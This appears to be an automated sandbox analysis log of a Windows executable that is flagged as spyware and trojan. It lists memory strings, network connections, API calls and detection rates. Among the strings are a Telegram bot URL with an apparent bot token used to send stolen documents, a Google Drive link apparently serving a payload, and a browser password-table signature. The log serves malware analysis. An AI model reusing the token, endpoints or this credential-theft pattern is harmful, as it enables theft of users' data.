            Source: c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035C8A000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035C24000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
            Source: c7WJL1gt32.exe, 00000004.00000003.2525192244.000000000545D000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000003.2525122829.000000000545D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: c7WJL1gt32.exe, 00000004.00000002.2954221736.00000000053E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: c7WJL1gt32.exe, 00000004.00000002.2954221736.0000000005423000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2954749935.0000000006F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1bncLeLVnb6OXPt4SnyT95T-ITWrz3Wd8
            Source: c7WJL1gt32.exe, 00000004.00000002.2954221736.0000000005423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1bncLeLVnb6OXPt4SnyT95T-ITWrz3Wd8S
            Source: c7WJL1gt32.exe, 00000004.00000003.2559440809.000000000545D000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2954221736.0000000005449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: c7WJL1gt32.exe, 00000004.00000003.2525192244.000000000545D000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000003.2559440809.000000000545D000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000003.2525122829.000000000545D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1bncLeLVnb6OXPt4SnyT95T-ITWrz3Wd8&export=download
            Source: c7WJL1gt32.exe, 00000004.00000002.2954221736.0000000005423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1bncLeLVnb6OXPt4SnyT95T-ITWrz3Wd8&export=download%
            Source: c7WJL1gt32.exe, 00000004.00000002.2954221736.000000000543D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1bncLeLVnb6OXPt4SnyT95T-ITWrz3Wd8&export=download2
            Source: c7WJL1gt32.exe, 00000004.00000003.2559440809.000000000545D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1bncLeLVnb6OXPt4SnyT95T-ITWrz3Wd8&export=downloadob
            Source: c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035AA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035AA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035AA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: c7WJL1gt32.exe, 00000004.00000003.2525192244.000000000545D000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000003.2525122829.000000000545D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: c7WJL1gt32.exe, 00000004.00000003.2525192244.000000000545D000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000003.2525122829.000000000545D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: c7WJL1gt32.exe, 00000004.00000003.2525192244.000000000545D000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000003.2525122829.000000000545D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: c7WJL1gt32.exe, 00000004.00000003.2525192244.000000000545D000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000003.2525122829.000000000545D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: c7WJL1gt32.exe, 00000004.00000003.2525192244.000000000545D000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000003.2525122829.000000000545D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: c7WJL1gt32.exe, 00000004.00000003.2525192244.000000000545D000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000003.2525122829.000000000545D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: c7WJL1gt32.exe, 00000004.00000003.2525192244.000000000545D000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000003.2525122829.000000000545D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: c7WJL1gt32.exe, 00000004.00000003.2525192244.000000000545D000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000003.2525122829.000000000545D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
            Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
            Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49890 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49896 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49968 version: TLS 1.2
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040558F
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 0_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,4_2_004034A5
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 0_2_00404DCC0_2_00404DCC
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 0_2_00406AF20_2_00406AF2
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 0_2_6CF11B5F0_2_6CF11B5F
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_00404DCC4_2_00404DCC
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_00406AF24_2_00406AF2
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_001543284_2_00154328
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_00158DF54_2_00158DF5
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_001559784_2_00155978
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_001519C44_2_001519C4
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6C6384_2_37B6C638
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6CCA04_2_37B6CCA0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B603AF4_2_37B603AF
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B633184_2_37B63318
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B678484_2_37B67848
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6E7904_2_37B6E790
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6E79F4_2_37B6E79F
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B67F604_2_37B67F60
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B66EA04_2_37B66EA0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B66E914_2_37B66E91
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6DEE14_2_37B6DEE1
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B676284_2_37B67628
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6BD884_2_37B6BD88
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6CC914_2_37B6CC91
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6B4F24_2_37B6B4F2
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6EBF74_2_37B6EBF7
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6E3394_2_37B6E339
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6DA894_2_37B6DA89
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6AAE84_2_37B6AAE8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6C1F24_2_37B6C1F2
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6C1E04_2_37B6C1E0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6B9304_2_37B6B930
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6B94A4_2_37B6B94A
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6B07F4_2_37B6B07F
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_37B6F0444_2_37B6F044
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_3831A9B04_2_3831A9B0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_3831BA974_2_3831BA97
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_3831A3604_2_3831A360
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38319D104_2_38319D10
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_3831BDF04_2_3831BDF0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383186504_2_38318650
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383196C84_2_383196C8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383148204_2_38314820
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383148104_2_38314810
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383170704_2_38317070
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383170614_2_38317061
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383118584_2_38311858
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383100404_2_38310040
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383118484_2_38311848
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383120FC4_2_383120FC
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_3831F1304_2_3831F130
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_3831F1204_2_3831F120
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383121084_2_38312108
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383129B84_2_383129B8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_3831A9A04_2_3831A9A0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383129A84_2_383129A8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383151F84_2_383151F8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383152084_2_38315208
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383132684_2_38313268
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38315AB84_2_38315AB8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38315AA84_2_38315AA8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38313B184_2_38313B18
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38313B084_2_38313B08
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383163684_2_38316368
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_3831A3524_2_3831A352
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383163584_2_38316358
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38317B4F4_2_38317B4F
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383143B94_2_383143B9
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383143C84_2_383143C8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38316C184_2_38316C18
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383114004_2_38311400
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38316C094_2_38316C09
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38311CB04_2_38311CB0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383174B84_2_383174B8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38311CA04_2_38311CA0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383174C84_2_383174C8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38319D004_2_38319D00
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383125604_2_38312560
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383125504_2_38312550
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38314DB04_2_38314DB0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38314DA04_2_38314DA0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38312E104_2_38312E10
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383156604_2_38315660
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383156504_2_38315650
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383186404_2_38318640
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383136B04_2_383136B0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383196B84_2_383196B8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383136C04_2_383136C0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38315F104_2_38315F10
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38315F014_2_38315F01
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38313F704_2_38313F70
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38313F604_2_38313F60
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383167B04_2_383167B0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38310FA84_2_38310FA8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_38310F984_2_38310F98
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_3831AFF74_2_3831AFF7
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_3831AFF84_2_3831AFF8
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383167C04_2_383167C0
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_3833D6C14_2_3833D6C1
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_3833E7904_2_3833E790
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_383383284_2_38338328
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: String function: 00402C41 appears 49 times
            Source: c7WJL1gt32.exe, 00000000.00000000.1699386894.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs c7WJL1gt32.exe
            Source: c7WJL1gt32.exe, 00000004.00000002.2950419658.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs c7WJL1gt32.exe
            Source: c7WJL1gt32.exe, 00000004.00000002.2954221736.0000000005423000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs c7WJL1gt32.exe
            Source: c7WJL1gt32.exe, 00000004.00000002.2978505242.0000000035877000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs c7WJL1gt32.exe
            Source: c7WJL1gt32.exeBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs c7WJL1gt32.exe
            Source: c7WJL1gt32.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 0_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 4_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,4_2_004034A5
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 0_2_00404850 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW,0_2_00404850
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,0_2_00402104
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeFile created: C:\Users\user\AppData\Local\IwJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeMutant created: NULL
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeFile created: C:\Users\user\AppData\Local\Temp\nsj8EFB.tmpJump to behavior
            Source: c7WJL1gt32.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035B23000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035B05000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035B15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: c7WJL1gt32.exeVirustotal: Detection: 77%
            Source: c7WJL1gt32.exeReversingLabs: Detection: 73%
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeFile read: C:\Users\user\Desktop\c7WJL1gt32.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\c7WJL1gt32.exe "C:\Users\user\Desktop\c7WJL1gt32.exe"
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess created: C:\Users\user\Desktop\c7WJL1gt32.exe "C:\Users\user\Desktop\c7WJL1gt32.exe"
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess created: C:\Users\user\Desktop\c7WJL1gt32.exe "C:\Users\user\Desktop\c7WJL1gt32.exe"Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeSection loaded: netutils.dllJump to behavior
